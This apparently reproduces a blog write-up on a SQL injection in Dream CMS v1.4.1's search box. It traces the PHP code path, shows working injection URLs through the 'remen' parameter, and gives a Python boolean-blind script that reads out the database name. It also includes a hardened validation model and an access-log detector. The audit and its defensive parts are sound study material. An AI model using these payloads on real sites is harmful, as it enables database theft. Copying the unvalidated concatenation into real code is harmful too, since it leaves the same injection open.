Dream CMS foreground search SQL injection
2022-07-19 11:26:00 【fantastic_ life】
The source code of v1.4.1 is kept in the current directory so that the source of the vulnerable version can still be found later.
Vulnerability requirements
Version: v1.4.1
Vulnerability analysis
This article reproduces the vulnerability from the write-up at https://xz.aliyun.com/t/11224, so we go straight to the vulnerability itself. The SQL injection point in this search box is quite interesting; once you have learned the basics of SQL injection, this is a good vulnerability to learn from.
The vulnerability is in the search box on the home page. I honestly had never paid attention to possible vulnerabilities in this spot before.
The code file corresponding to the search interface is c/index/SearchAction.class.php; its contents are as follows:
class SearchAction extends HomeAction{
    private $searchModel = null;
    private $param;
    public function __construct(){
        parent::__construct();
        if(!$this->config['is_search']) rewrite::error($this->l['search_is_on']);
        $this->searchTime(); // Verify the search interval
        $this->check(); // Verify received data
        if($this->searchModel == null) $this->searchModel = new SearchModel();
    }
    public function index(){
        $this->param['ischild'] = 1;
        $arr = $this->searchModel->getSerachField($this->param);// Initialize the conditions
        $count = $this->searchModel->searchCoutn($arr);
        if($count > 0){
            $page = new page($count,$GLOBALS['public']['searchnum']);
            // Get list data
            $arr['page'] = $page->returnLimit();
            $arr['is_home'] = 1;
            $searchData = $this->searchModel->getSearchList($arr,$this->param);
            // Assign url and other variables
            foreach($searchData as $v){
                $param['type'] = 'content';
                $param['classid'] = $v['classid'];
                $param['classpath'] = $GLOBALS['allclass'][$v['classid']]['classpath'];
                $param['time'] = $v['time'];
                $param['id'] = $v['id'];
                $v['classname'] = $GLOBALS['allclass'][$v['classid']]['classname'];
                $v['url'] = $v['url'] ? $v['url'] : url($param);
                $v['classurl'] = classurl($v['classid']);
                $v['classimage'] = $GLOBALS['allclass'][$v['classid']]['images'];
                $v['parent_classid'] = $GLOBALS['allclass'][$v['classid']]['uid'];
                $newlist[] = $v;
            }
            $this->smarty->assign('list',$newlist);
            $this->smarty->assign('page',$page->html());
        }
        $this->smarty->assign('num',$count);
        // Get the search list template
        if(!$this->param['tem']){
            if($this->param['classid']){
                $classtem = $GLOBALS['allclass'][$arr['classid']]['searchtem'];
                $arr['tem'] = $classtem ? $classtem : 'index';
            }else{
                $arr['tem'] = 'index';
            }
        }else{
            $arr['tem'] = $this->param['tem'];
        }
        $this->setSearchTime(); // Save search time
        $this->smarty->assign('title',$this->param['keywords']);
        $this->smarty->assign('keywords',$this->param['keywords']);
        $this->smarty->assign('description',$this->param['keywords']);
        $this->smarty->display('search/'.$arr['tem'].'.html');
    }
    // Verify the received data and return
    private function check(){
        // Get the GET data
        $_GET = filter_strs($_GET);
        $data = p(2,1,1);
        $this->param['keywords'] = string::delHtml($data['keywords']);
        if(!$this->param['keywords'] && $this->config['search_isnull']){
            rewrite::error($this->l['search_is_keywords']);
        }
        $this->param['classid'] = (int)$data['classid'];
        $this->param['mid'] = (int)$data['mid'];
        if(!$this->param['classid'] && !$this->param['mid']) rewrite::error($this->l['search_is_param']);
        if($this->param['classid'] && !isset($GLOBALS['allclass'][$this->param['classid']])){
            rewrite::error($this->l['search_is_classid']);
        }
        if($this->param['mid'] && !isset($GLOBALS['allmodule'][$this->param['mid']])){
            rewrite::error($this->l['search_is_mid']);
        }
        $this->param['tem'] = $data['tem'];
        $this->param['field'] = $data['field'];
        $this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
        $this->param['tuijian'] = $data['tuijian'];
        $this->param['remen'] = $data['remen'];
    }
}
As you can see from the code above, the constructor calls $this->check(); to validate the received data. Tracing into check(), the keywords parameter is required, and string::delHtml($data['keywords']); is applied to keywords. delHtml is defined in class/string.class.php as follows:
// Strip html tags
public static function delHtml($str){
    return strip_tags($str);
}
It only strips HTML tags. Back in index(), the code goes on to execute $count = $this->searchModel->searchCoutn($arr);, which leads to the searchCoutn method in m/SearchModel.class.php:
// Get the total number of search results
public function searchCoutn($searchInfo){
    $param = $this->sqlStr($searchInfo);
    $param['force'] = 'title';
    return parent::countModel($param);
}
Continue tracing to the countModel method in class/Model.class.php:
// Return the number of records
protected function countModel($param=array()){
    return parent::countDB($this->tab['0'],$param);
}
Finally it traces to the countDB method in class/db.class.php:
// Count the query records
protected function countDB($tab,$param){
    $We = $this->where($param);
    $sql="SELECT count(1) FROM ".DB_PRE."$tab $We";
    // echo $sql;
    $result=$this->query($sql);
    $data = mysql_fetch_row($result);
    $this->result($result);
    return $data['0'];
}
For convenience you can uncomment echo $sql; for debugging, which prints the SQL currently being executed.
That is the overall trace of the vulnerable code. Now let's go back to the check method in the original file c/index/SearchAction.class.php:
// Verify the received data and return
private function check(){
    // Get the GET data
    $_GET = filter_strs($_GET);
    $data = p(2,1,1);
    $this->param['keywords'] = string::delHtml($data['keywords']);
    if(!$this->param['keywords'] && $this->config['search_isnull']){
        rewrite::error($this->l['search_is_keywords']);
    }
    $this->param['classid'] = (int)$data['classid'];
    $this->param['mid'] = (int)$data['mid'];
    if(!$this->param['classid'] && !$this->param['mid']) rewrite::error($this->l['search_is_param']);
    if($this->param['classid'] && !isset($GLOBALS['allclass'][$this->param['classid']])){
        rewrite::error($this->l['search_is_classid']);
    }
    if($this->param['mid'] && !isset($GLOBALS['allmodule'][$this->param['mid']])){
        rewrite::error($this->l['search_is_mid']);
    }
    $this->param['tem'] = $data['tem'];
    $this->param['field'] = $data['field'];
    $this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
    $this->param['tuijian'] = $data['tuijian'];
    $this->param['remen'] = $data['remen'];
}
Note that $data = p(2,1,1); escapes the single quotes in the parameters we pass in, and some functions are filtered out.
In fact this method also gives us a useful piece of information:
$this->param['tem'] = $data['tem'];
$this->param['field'] = $data['field'];
$this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
$this->param['tuijian'] = $data['tuijian'];
$this->param['remen'] = $data['remen'];
These can all be passed as request parameters; next I use remen to test.
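To show why the quote-escaping done by p(2,1,1) does not protect remen and tuijian, here is an added Python model of the check()/countDB() logic traced above (not the CMS's own code; the in() list of child classes is simplified to the single classid). The vulnerable builder mirrors the concatenation, and the hardened builder applies the same integer validation the code already uses for classid and mid.

```python
import re

# Added Python model of the logic traced above, not the CMS's own code:
# escape_quotes() stands in for p(2,1,1), to_int() for the (int) cast the
# check() method applies to classid and mid, and the build_where_* functions
# for the WHERE clause countDB() ends up executing.

TIME_LIMIT = 1626240056  # the time bound seen in the printed SQL


def escape_quotes(value: str) -> str:
    """Backslash-escape quotes, the effect p(2,1,1) has on every parameter."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def to_int(value):
    """Accept only a plain integer. This is stricter than PHP's (int) cast,
    which keeps the leading digits of '2 or (1=1)' and drops the rest."""
    if value is None or not re.fullmatch(r"-?\d+", value):
        return None
    return int(value)


def build_where_vulnerable(params: dict) -> str:
    """Vulnerable pattern: every value is quote-escaped, but remen/tuijian are
    concatenated into an unquoted numeric context, where escaping helps nothing."""
    clauses = [f"time > {TIME_LIMIT}"]
    for name in ("remen", "tuijian"):
        if params.get(name):
            clauses.append(f"{name}={escape_quotes(params[name])}")
    clauses.append(f"classid in({int(params['classid'])})")
    clauses.append(f"(title like '%{escape_quotes(params['keywords'])}%')")
    return "WHERE " + " AND ".join(clauses)


def build_where_hardened(params: dict) -> str:
    """Hardened form: numeric parameters are validated as integers before they
    reach the SQL string, so the numeric context cannot be broken out of."""
    classid = to_int(params.get("classid"))
    if classid is None:
        raise ValueError("classid must be an integer")
    clauses = [f"time > {TIME_LIMIT}"]
    for name in ("remen", "tuijian"):
        number = to_int(params.get(name))
        if number is not None:  # non-integer input is simply not used
            clauses.append(f"{name}={number}")
    clauses.append(f"classid in({classid})")
    clauses.append(f"(title like '%{escape_quotes(params['keywords'])}%')")
    return "WHERE " + " AND ".join(clauses)
```

Calling build_where_vulnerable with remen set to "2 or (1=1)" keeps the or-clause in the WHERE string, while build_where_hardened drops the parameter entirely.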
Vulnerability testing
Send the following request: /index.php?m=Search&a=index&classid=5&tem=index&field=title&keywords=c&remen=11 and look at the printed SQL:
SELECT count(1) FROM lmx_product_data WHERE time > 1626240056 AND remen=11 AND classid in(11,12,13,14,5) AND (title like '%c%') ORDER BY id desc
You can see that the remen value we passed has been concatenated into the SQL; what remains is the injection test.
Send the request /index.php?m=Search&a=index&classid=5&tem=index&field=title&keywords=c&remen=2%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+ . Because single quotes are escaped, ascii is used here. The database we set up for testing is named lmxcms; its first character is l, which corresponds to 0x6c. The page then returns Content-Length: 7722; if our value is not 0x6c, the returned length is Content-Length: 4955.
So you can write code based on this to obtain database information:
import requests

# Boolean-based blind test: the page is longer when the condition is true
url = "http://192.168.80.154:9090?m=search&keywords=b&mid=1&remen=1 or (if(ascii(substr(database(),{},1))={},1,0))--+"
result = ""
for i in range(1, 7):  # position in the database name
    for j in range(80, 180):  # candidate character code
        cl = url.format(i, hex(j))
        res = requests.get(cl)
        if len(res.text) > 6000:  # the true branch returns the longer page
            result += chr(j)
print(result)
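From the defender's side, the requests in this section can be spotted in web-server access logs. The following is an added Python example (not from the original post) that flags search requests whose integer-only parameters remen, tuijian, classid and mid carry non-integer text; the log format and sample lines are constructed to match the requests shown above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added detection example, not part of the original post: scan web-server access
# logs for Dream CMS search requests whose integer-only parameters carry anything
# other than an integer. The log format and the sample lines are constructed.

INT_ONLY_PARAMS = ("classid", "mid", "remen", "tuijian")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
    r' [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2022:11:26:00 +0800] "GET /index.php?m=Search&a=index&classid=5&tem=index&field=title&keywords=c&remen=11 HTTP/1.1" 200 7722
10.0.0.5 - - [19/Jul/2022:11:26:03 +0800] "GET /index.php?m=Search&a=index&classid=5&keywords=c&remen=2%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+ HTTP/1.1" 200 7722
10.0.0.7 - - [19/Jul/2022:11:27:10 +0800] "GET /index.php?m=Content&a=lists&classid=5 HTTP/1.1" 200 4100
10.0.0.9 - - [19/Jul/2022:11:28:00 +0800] "GET /index.php?m=search&keywords=b&mid=1&remen=1%20or%201%3D1 HTTP/1.1" 200 4955
"""


def suspicious_params(query: dict) -> dict:
    """Return the integer-only parameters whose URL-decoded value is not an integer."""
    return {
        name: value
        for name in INT_ONLY_PARAMS
        for value in query.get(name, [])
        if not re.fullmatch(r"-?\d+", value)
    }


def scan_log(text: str) -> list:
    """One finding per search request that carries a non-integer numeric parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group("target")).query, keep_blank_values=True)
        if query.get("m", [""])[0].lower() != "search":  # only the SearchAction controller
            continue
        bad = suspicious_params(query)
        if bad:
            findings.append({"ip": match.group("ip"), "time": match.group("time"),
                             "size": match.group("size"), "params": bad})
    return findings
```

The response size is kept in each finding because the blind test above tells true from false conditions by content length, so a burst of such requests alternating between two sizes from one client is the pattern to look for.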
Summary
This vulnerability is a very good code-audit example: the code is not complicated, and even if you don't know PHP you can get started quickly.